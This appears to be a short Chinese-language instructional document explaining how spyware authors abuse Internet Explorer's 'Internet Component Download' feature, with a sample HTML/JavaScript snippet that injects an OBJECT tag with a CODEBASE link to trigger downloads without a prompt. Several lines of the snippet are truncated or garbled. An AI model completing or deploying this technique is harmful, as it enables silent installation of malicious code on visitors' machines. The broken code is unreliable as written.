利用互联网程序代码下载链接功能.docx

编号：
时间：2021年x月x日
书山有路勤为径，学海无涯苦作舟
页码：第页 共2页
: .
实例4 利用“互联网程序代码下载链接”功能
间谍软件攻击者会根据Microsoft网站上的知识库文章中贴出的某段样本程序代码来利用“互联网程序代码下载链接”功能。浏览带有此间谍软件的站点时，工作站会在没有文件下载提示的情况下接受恶意下载（就像已签署了安全性一样）。根据浏览器的安全性设定值，“安全警告”并不一定会显示。以下样本程序代码提供一个使用“互联网程序代码下载链接”功能的范例：
<HTML><HEAD><TITLE>Page of executable links</TITLE></HEAD>
<BODY>
<BR/>
<!-- hyperlink uses central script function called linkit() -->
<A HREF="" onclick = "return linkit ('signed-');"> </A>
<SCRIPT>
// linkit puts filename into HTML content and spews it into iframefunction linkit(filename)
{
strpagestart = "<HTML><HEAD></HEAD><BODY><OBJECT CLASSID=" +
"'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A' CODEBASE='";
strpageend = "'></OBJECT></BODY></HTML>";
();
(strpagestart + filename + strpageend);
= "Done.";
return false; // stop hyperlink and stay on this page
}